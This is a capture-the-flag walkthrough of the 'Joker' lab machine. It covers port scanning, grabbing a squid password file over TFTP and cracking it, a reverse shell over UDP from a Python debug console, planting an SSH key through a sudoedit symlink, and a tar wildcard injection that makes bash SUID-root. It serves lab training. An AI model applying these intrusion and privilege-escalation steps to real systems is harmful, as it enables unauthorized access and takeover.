Joker
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.21 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Thu Sep 15 18:41:46 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.21
Nmap scan report for 10.10.10.21
Host is up (0.045s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
# Nmap done at Thu Sep 15 18:42:12 2022 -- 1 IP address (1 host up) scanned in 26.59 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,3128 10.10.10.146 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Sep 15 18:42:32 2022 as: nmap -sCV -p22,3128 -oN targeted 10.10.10.21
Nmap scan report for 10.10.10.21
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 88:24:e3:57:10:9f:1b:17:3d:7a:f3:26:3d:b6:33:4e (RSA)
| 256 76:b6:f6:08:00:bd:68:ce:97:cb:08:e7:77:69:3d:8a (ECDSA)
|_ 256 dc:91:e4:8d:d0:16:ce:cf:3d:91:82:09:23:a7:dc:86 (ED25519)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Ifo: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 15 18:42:48 2022 -- 1 IP address (1 host up) scanned in 15.75 secondsWe only see port 22 (SSH), and port 3128 (Squid), which is a web proxy cache. In order to use it, we'll have to make a new proxy configuration in the FoxyProxy extension.
If we access the HTTP server through the web proxy, it will ask for credentials.
****** ERROR ******
***** Cache Access Denied. *****
===============================================================================
The following error was encountered while trying to retrieve the URL: http://
10.10.10.21:3128/
Cache Access Denied.
Sorry, you are not currently allowed to request http://10.10.10.21:3128/ from
this cache until you have authenticated yourself.
Please contact the cache_administrator if you have difficulties authenticating
yourself.
===============================================================================
Generated Fri, 16 Sep 2022 11:39:25 GMT by joker (squid/3.5.12)As we don't have credentials, there is not much we can do with the web proxy. We need to find credentials. One thing that we have missed, is UDP ports. There is one particular service called TFTP which is exposed through the UDP 69 port. Nmap report the port as filtered|open.
nmap -p69 -sU 10.10.10.21 -oN udpScan
-pscan specific port.-sUUDP scan.-oNsave the scan result into file, in this case the udpScan file.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-16 13:40 CEST
Nmap scan report for 10.10.10.21
Host is up (0.049s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
Nmap done: 1 IP address (1 host up) scanned in 1.05 secondsExploitation
If we connect to the TFTP server, and try to get the /etc/passwd file, we'll get an access violation error.
tftp 10.10.10.21
tftp> get /etc/passwd
Error code 2: Access violationBut, one file that might be interesting to get is the squid configuration file /etc/squid/squid.conf, which is allow to download.
tftp> get /etc/squid/squid.conf
Received 295428 bytes in 30.8 secondsInside the configuration file, there is a line where the authentication is being configured, and it shows the /etc/squid/passwords file.
cat squid.conf | grep -v "#" | sed '/^$/d'
acl SSL_ports port 443
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access deny manager
auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwords
auth_param basic realm kalamari
acl authenticated proxy_auth REQUIRED
http_access allow authenticated
http_access deny all
http_port 3128
coredump_dir /var/spool/squid
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880
refresh_pattern . 0 20% 4320Let's download that file.
tftp> get /etc/squid/passwords
Received 48 bytes in 0.1 secondsThe file contains a password hash for the kalamari user.
cat passwords
kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0Let's break the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateseafood (kalamari)
1g 0:00:03:50 DONE (2022-09-16 13:57) 0.004343g/s 31787p/s 31787c/s 31787C/s ihatesia..ihatepz
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now that we have credentials, let's modify the proxy on FoxyProxy, and add the username and password.
As every request goes through the web proxy, we can access resources that we weren't available to access previously. For example, we could try to access the HTTP server. To do it, access 127.0.0.1:80 from the browser.
Before exploring the site, let's enumerate subdirectories with gobuster. Make sure to run the command through the proxy with the credentials.
gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php --proxy http://kalamari:ihateseafood@10.10.10.21:3128
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.-xfile extensions to search for.--proxyspecifies proxy.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] Proxy: http://kalamari:ihateseafood@10.10.10.21:3128
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/09/16 13:59:53 Starting gobuster in directory enumeration mode
===============================================================
/list (Status: 301) [Size: 251] [--> http://127.0.0.1/list/]
/console (Status: 200) [Size: 1479]
===============================================================
2022/09/16 14:09:11 Finished
===============================================================The /console directory shows a python interactive console where I can run code.
We could try to get a reverse shell with netcat. First, set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, import the os library, and send a reverse shell to our machine.
But, the netcat listener doesn't receive any connection. This might be happening because of some firewall configuration. Let's see what is inside the /etc/iptables directory. To see the output of the command, use os.popen().read().
Let's get the content of the rules.v4 file, but encoded in base64.
If we decode the content, we'll see that the firewall is blocking any TCP connection, except input connection to ports 22, and 3128. But UDP is accepted by the firewall, so we could send the reverse shell through UDP.
echo 'IyBHZW...wMTcK' | base64 -d
# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017Set another netcat listener listening on the UDP port 4444.
nc -lvnp 4444 -u
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.-uUDP mode.
Now send the reverse shell we sent before, but this time with the -u argument.
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.21] 35333
/bin/sh: 0: can't access tty; job control turned off
$ whoami
werkzeugPrivilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we check the sudo privileges, we'll see that we can run as the alekos user the sudoedit command in the /var/www/*/*/layout.html file.
sudo -l
Matching Defaults entries for werkzeug on joker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
sudoedit_follow, !sudoedit_checkdir
User werkzeug may run the following commands on joker:
(alekos) NOPASSWD: sudoedit /var/www/*/*/layout.htmlLet's create the correct path. Inside the /var/www/ directory there is another one called testing, which we are the owners, so we can create directories inside.
ls -l /var/www/
total 12
-rwxr-x--- 1 root werkzeug 581 May 18 2017 manage-shorty.py
drwxr-x--- 5 root werkzeug 4096 May 18 2017 shorty
drwxr-xr-x 2 werkzeug werkzeug 4096 May 18 2017 testingLet's create the pwned directory inside testing.
mkdir /var/www/testing/pwned
Now, create the layout.html file inside.
touch /var/www/testing/pwned/layout.html
Now, we can run the sudoedit command on that file as the alekos user. To get a shell, one thing we could do is make a symbolic link from layout.html to the authorized_keys file of alekos, and put inside our public SSH key so we are allowed to login as alekos to the system without the need of his password. First, create a symbolic link.
n -s -f /home/alekos/.ssh/authorized_keys layout.html
-smake a symbolic link.-fforce.
Now, on our local machine, create a pair of SSH keys.
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:BB525izsjrcx4YURZ4Alw/RcnBBo+qu/GliJ9DGavw4 root@alfa8sa
The key's randomart image is:
+---[RSA 3072]----+
| o++X=*. |
| =O %o |
| . = B + |
|..=.o. = |
|.ooo + S |
| o. .+ o |
|.E....* |
| ..o. + |
| +*o.. |
+----[SHA256]-----+Copy the public key.
cat id_rsa.pub | xclip -sel clip
Now, run the sudoedit command on the layout.html file as the alekos user, and paste you public key.
sudoedit -u alekos /var/www/testing/pwned/layout.html
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHO61hOb4HBT0LprkG+SGm5x+EM+GQhrPPFfuNVTuDENIn3wJ38rx57GVTXssgjCpkU4A+BozL/xkj0oTbiMy3dvnOxkS6H70P7JGt/bdo8mzDpluNIwesZy4pclQuJ1Myx09Owx6SOgihMQlUUHArFdObnPjrCpTt+YlJOvSDU+32tWgJblwH4aBGw5cZAhq+v1zR0WUQ8TI7uSVpor3n+R+k/54qYYS6GTMKvc/kCjehlNDqpWuwwidvTK23cLcvhRDfW7ICOe7DjuRiGSAamfH6GD+jmnyeEZxpknpLL7k9Au4EUtkSlecOy3lJ5e4EvgJNka9/VIJ2bSzyyJx26r8XF9vCtSDa9ScOSmidWBV3POkV4Jx5ZjSGTSXrN9TZVHE/FFJyzoXdoZuXqsUxeiCY9doJBXS7JQLd5db1dmN80QenDQtZardBhyhWEkRIVFUQI3p/arunvK8SGzEsBbrV5dtKlPtrcsGfoAEO/hoLydOvQxdUKNdN8NLkQQU= root@alfa8saNow we should be able to log in via SSH as alekos without using a password. Then, we'll be able to grab the user flag.
ssh alekos@10.10.10.21
Welcome to Ubuntu 16.10 (GNU/Linux 4.8.0-52-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Sep 16 15:41:59 2022 from 10.10.14.11
alekos@joker:~$ whoami
alekos
alekos@joker:~$ cat user.txt
583c85e1b7d552e8d75e61f1382dcc1fInside the home directory of the alekos user, there are two directories.
ls -l
total 20
drwxrwx--- 2 root alekos 12288 Sep 16 15:40 backup
drwxr-x--- 5 alekos alekos 4096 May 18 2017 development
-r--r----- 1 root alekos 33 Sep 16 14:31 user.txtThe development directory has some files an folders of an application.
ls -l development/
total 28
-rw-r----- 1 alekos alekos 1452 May 18 2017 application.py
drwxrwx--- 2 alekos alekos 4096 May 18 2017 data
-rw-r----- 1 alekos alekos 0 May 18 2017 __init__.py
-rw-r----- 1 alekos alekos 997 May 18 2017 models.py
drwxr-x--- 2 alekos alekos 4096 May 18 2017 static
drwxr-x--- 2 alekos alekos 4096 May 18 2017 templates
-rw-r----- 1 alekos alekos 2500 May 18 2017 utils.py
-rw-r----- 1 alekos alekos 1748 May 18 2017 views.pyAnd the backup directory has some backup files of the development directory. The backup files are made by the root user.
ls -l backup/
total 680
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134201.tar.gz
-rw-r----- 1 root alekos 40960 Dec 24 2017 dev-1514134501.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:35 dev-1663328101.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:40 dev-1663328401.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:45 dev-1663328701.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:50 dev-1663329001.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 14:55 dev-1663329301.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:00 dev-1663329602.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:05 dev-1663329901.tar.gz
-rw-r----- 1 root alekos 40960 Sep 16 15:10 dev-1663330201.tar.gzIf the root user is make all this backup files with the tar tool, and is using a wildcard character *, there is a way to escalate privileges to root. I suppose that root might me running a command like this.
tar -czvf dev-1514134201.tar.gz /home/alekos/development/*
If this is the case, we can make the root user give the /bin/bash binary the SUID permission. First, make a file called privEsc on the development directory with the following content.
nano /home/alekos/development/privEsc
chmod u+s /bin/bashNow, we'll have to make a file called --checkpoint=1 inside development.
touch -- '/home/alekos/development/--checkpoint=1'
Create another file called --checkpoint-action=exec=bash privEsc.
touch -- '/home/alekos/development/--checkpoint-action=exec=bash privEsc'
Now, if we wait for the root user to compress the development directory, those two files will act as arguments of the tar command, and it will run the privEsc script.
ls -l /bin/bash
-rwsr-xr-x 1 root root 1041576 May 16 2017 /bin/bashNow, all we have to do is run bash with SUID permissions, and reap the harvest and take the root flag.
bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
7149317b70b4884de06ce96e0536641aLast updated
Was this helpful?